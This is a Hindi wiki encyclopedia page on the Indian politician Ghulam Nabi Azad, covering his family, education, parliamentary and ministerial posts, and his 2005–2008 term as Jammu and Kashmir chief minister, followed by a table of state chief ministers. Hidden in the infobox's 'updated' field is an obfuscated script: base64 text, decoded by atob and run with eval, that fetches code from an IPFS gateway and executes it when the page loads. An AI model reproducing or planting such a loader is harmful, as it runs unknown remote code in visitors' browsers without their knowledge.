ग़ुलाम नबी आज़ाद

भारत डिस्कवरी प्रस्तुति
रविन्द्र प्रसाद (चर्चा | योगदान) द्वारा परिवर्तित 09:03, 8 मार्च 2020 का अवतरण
(अंतर) ← पुराना अवतरण | वर्तमान अवतरण (अंतर) | नया अवतरण → (अंतर)
यहाँ जाएँ:भ्रमण, खोजें
ग़ुलाम नबी आज़ाद
ग़ुलाम नबी आज़ाद
पूरा नाम ग़ुलाम नबी आज़ाद
जन्म 7 मार्च, 1949
जन्म भूमि सोती गांव, ज़िला डोडा, जम्मू और कश्मीर
अभिभावक पिता- रहमतुल्लाह बट्ट, माता- वासा बेगम
पति/पत्नी शमीम देव आज़ाद
संतान पुत्र- सद्दाम नबी आज़ाद, पुत्री- सोफिया नबी आज़ाद
नागरिकता भारतीय
प्रसिद्धि राजनीतिज्ञ
पार्टी भारतीय राष्ट्रीय कांग्रेस
पद 10वें मुख्यमंत्री, जम्मू-कश्मीर
कार्य काल स्वास्थ्य एवं परिवार कल्याण मंत्री-22 मई, 2009 से 26 मई, 2014 तक

मुख्यमंत्री-2 नवंबर 2005 से 11 जुलाई 2008 तक

शिक्षा जूलॉजी में मास्टर ऑफ साइंस
विद्यालय कश्मीर विश्वविद्यालय
अन्य जानकारी ग़ुलाम नबी आज़ाद ने 1973 में भालेसा में ब्लॉक कांग्रेस कमेटी के सचिव के रूप में काम करने के तुरंत बाद राजनीतिक जीवन की शुरुआत की। दो साल बाद उन्हें जम्मू और कश्मीर प्रदेश युवा कांग्रेस के अध्यक्ष के रूप में नामित किया गया था।
अद्यतन‎ <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

ग़ुलाम नबी आज़ाद (अंग्रेज़ी: Ghulam Nabi Azad, जन्म- 7 मार्च, 1949) भारतीय राष्ट्रीय कांग्रेस के प्रसिद्ध और वरिष्ठ राजनीतिज्ञ हैं। पूर्व में यूपीए सरकार में वह कई पदों पर रह चुके हैं। मनमोहन सिंह की सरकार के पहले कार्यकाल में ग़ुलाम नबी आज़ाद संसदीय कार्य मंत्री रहे और 27 अक्टूबर, 2005 तक इस पद पर रहे। इसके बाद वह जम्मू और कश्मीर के मुख्यमंत्री बने। उन्होंने 1980 में महाराष्ट्र में वाशिम निर्वाचन क्षेत्र से अपना पहला संसदीय चुनाव जीता था। ग़ुलाम नबी आज़ाद को 1982 में 'कानून, न्याय और कंपनी मामलों के मंत्रालय' में केंद्रीय मंत्री के रूप में कैबिनेट में शामिल किया गया था। इसके बाद वे राजनीतिक ऊंचाई पर पहुंच गए और राज्य मंत्री के रूप में सरकार में कुछ और शानदार भूमिकाएँ निभाईं। इसके परिणामस्वरूप 2005 में जम्मू और कश्मीर के मुख्यमंत्री के रूप में शपथ ली।

जन्म

ग़ुलाम नबी आज़ाद का जन्म 7 मार्च, 1949 को जम्मू और कश्मीर के डोडा जिले में सोती गांव में हुआ था। वह रहमतुल्लाह बट्ट और वासा बेगम के पुत्र हैं। जम्मू से उन्होंने अपनी बैचलर की डिग्री प्राप्त की। इसके बाद उन्होंने 1972 में कश्मीर विश्वविद्यालय से जूलॉजी में मास्टर ऑफ साइंस पूरा किया। ग़ुलाम नबी आज़ाद ने 1980 में एक प्रसिद्ध कश्मीरी गायिका शमीम देव आज़ाद से शादी की। उनके एक पुत्र सद्दाम नबी आज़ाद और एक बेटी सोफिया नबी आज़ाद हैं।

राजनीतिक जीवन

ग़ुलाम नबी आज़ाद ने 1973 में भालेसा में ब्लॉक कांग्रेस कमेटी के सचिव के रूप में काम करने के तुरंत बाद अपने राजनीतिक जीवन की शुरुआत की। दो साल बाद उन्हें जम्मू और कश्मीर प्रदेश युवा कांग्रेस के अध्यक्ष के रूप में नामित किया गया। 1980 में उन्हें अखिल भारतीय युवा कांग्रेस के अध्यक्ष के रूप में नियुक्त किया गया था। 1980 में महाराष्ट्र के वाशिम (लोकसभा निर्वाचन क्षेत्र) से सातवीं लोक सभा के लिए चुने जाने के बाद ग़ुलाम नबी आज़ाद ने 1982 में कानून, न्याय और कंपनी मामलों के मंत्रालय के प्रभारी उपमंत्री के रूप में केंद्र सरकार में प्रवेश किया। सन 1984 में वह आठवीं लोकसभा के लिए चुने गए और राज्य सभा के रूप में महाराष्ट्र के पहले सदस्य (1990-1996) थे। पी. वी. नरसिम्हा राव की सरकार के दौरान ग़ुलाम नबी आज़ाद ने संसदीय कार्य और नागरिक उड्डयन मंत्रालयों का प्रभार संभाला।

मुख्यमंत्री का पद

2 नवंबर, 2005 को ग़ुलाम नबी आज़ाद ने जम्मू और कश्मीर के मुख्यमंत्री के रूप में शपथ ली। जून, 2008 में उनकी सरकार ने एक हिंदू मंदिर के बोर्ड में भूमि हस्तांतरण करने की योजना की घोषणा की। कई मुसलमानों को इस निर्णय ने नाराज किया और फलस्वरूप उनका विरोध शुरू हो गया। सात लोग हिंसा में मारे गए थे। जम्मू-कश्मीर में भारतीय राष्ट्रीय कांग्रेस के एक गठबंधन दल पीपुल्स डेमोक्रेटिक पार्टी ने सरकार से अपना समर्थन वापस ले लिया और अपनी सरकार को बनाए रखने की कोशिश करने की बजाय ग़ुलाम नबी आज़ाद ने 7 जुलाई, 2008 को इस्तीफा दे दिया।

पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

बाहरी कड़ियाँ

संबंधित लेख

भारतीय राज्यों में पदस्थ मुख्यमंत्री
क्रमांक राज्य मुख्यमंत्री तस्वीर पार्टी पदभार ग्रहण
1. अरुणाचल प्रदेश पेमा खांडू
Pema-Khandu.jpg
भाजपा 17 जुलाई, 2016
2. असम हिमंता बिस्वा सरमा
Himanta-Biswa-Sarma.jpg
भाजपा 10 मई, 2021
3. आंध्र प्रदेश वाई एस जगनमोहन रेड्डी
Y-S-Jaganmohan-Reddy.jpg
वाईएसआर कांग्रेस पार्टी 30 मई, 2019
4. उत्तर प्रदेश योगी आदित्यनाथ
Yogi-Adityanath-1.jpg
भाजपा 19 मार्च, 2017
5. उत्तराखण्ड पुष्कर सिंह धामी
Pushkar-Singh-Dhami.jpg
भाजपा 4 जुलाई, 2021
6. ओडिशा नवीन पटनायक
Naveen-Patnaik.jpg
बीजू जनता दल 5 मार्च, 2000
7. कर्नाटक सिद्धारमैया
Siddaramaiah.jpg
भारतीय राष्ट्रीय कांग्रेस 20 मई, 2023
8. केरल पिनाराई विजयन
Pinarayi Vijayan.jpg
मार्क्सवादी कम्युनिस्ट पार्टी 25 मई, 2016
9. गुजरात भूपेन्द्र पटेल
Bhupendra-Patel.jpg
भाजपा 12 सितम्बर, 2021
10. गोवा प्रमोद सावंत
Pramod-Sawant.jpg
भाजपा 19 मार्च, 2019
11. छत्तीसगढ़ विष्णु देव साय
Vishnu-Deo-Sai.jpg
भारतीय जनता पार्टी 13 दिसम्बर, 2023
12. जम्मू-कश्मीर रिक्त (राज्यपाल शासन) लागू नहीं 20 जून, 2018
13. झारखण्ड हेमन्त सोरेन
Hemant-Soren.JPG
झारखंड मुक्ति मोर्चा 29 दिसम्बर, 2019
14. तमिल नाडु एम. के. स्टालिन
M-K-Stalin.jpg
द्रविड़ मुन्नेत्र कड़गम 7 मई, 2021
15. त्रिपुरा माणिक साहा
Manik-Saha.jpeg
भाजपा 15 मई, 2022
16. तेलंगाना अनुमुला रेवंत रेड्डी
Revanth-Reddy.jpg
भारतीय राष्ट्रीय काँग्रेस 7 दिसंबर, 2023
17. दिल्ली अरविन्द केजरीवाल
KEJRIWAL.jpg
आप 14 फ़रवरी, 2015
18. नागालैण्ड नेफियू रियो
Neiphiu-Rio.jpg
एनडीपीपी 8 मार्च, 2018
19. पंजाब भगवंत मान
Bhagwant-Mann.jpg
आम आदमी पार्टी 16 मार्च, 2022
20. पश्चिम बंगाल ममता बनर्जी
Mamata Banerjee.jpg
तृणमूल कांग्रेस 20 मई, 2011
21. पुदुचेरी एन. रंगास्वामी
N-Rangasamy.jpg
कांग्रेस 7 मई, 2021
22. बिहार नितीश कुमार
Nitish-Kumar-1.jpg
जदयू 27 जुलाई, 2017
23. मणिपुर एन. बीरेन सिंह
N.Biren-Singh-1.jpg
भाजपा 15 मार्च, 2017
24. मध्य प्रदेश मोहन यादव
Mohan-Yadav.jpg
भाजपा 13 दिसंबर, 2023
25. महाराष्ट्र एकनाथ शिंदे
Eknath-Shinde.jpg
शिव सेना 30 जून, 2022
26. मिज़ोरम लालदुहोमा
Lalduhoma.jpg
जोरम पीपल्स मूवमेंट 8 दिसम्बर, 2023
27. मेघालय कॉनराड संगमा
Conrad-Sangma-1.jpg
एनपीपी 6 मार्च, 2018
28. राजस्थान भजन लाल शर्मा
Bhajan-Lal-Sharma.jpg
भारतीय जनता पार्टी 15 दिसम्बर, 2023
29. सिक्किम प्रेम सिंह तमांग
Prem-Singh-Tamang.jpg
सिक्किम क्रांतिकारी मोर्चा 27 मई, 2019
30. हरियाणा नायब सिंह सैनी
Nayab-Singh-Saini.jpg
भाजपा 12 मार्च, 2024
31. हिमाचल प्रदेश सुखविंदर सिंह सुक्खू
Sukhvinder-Singh-Sukhu.jpg
भारतीय राष्ट्रीय कांग्रेस 11 दिसम्बर, 2022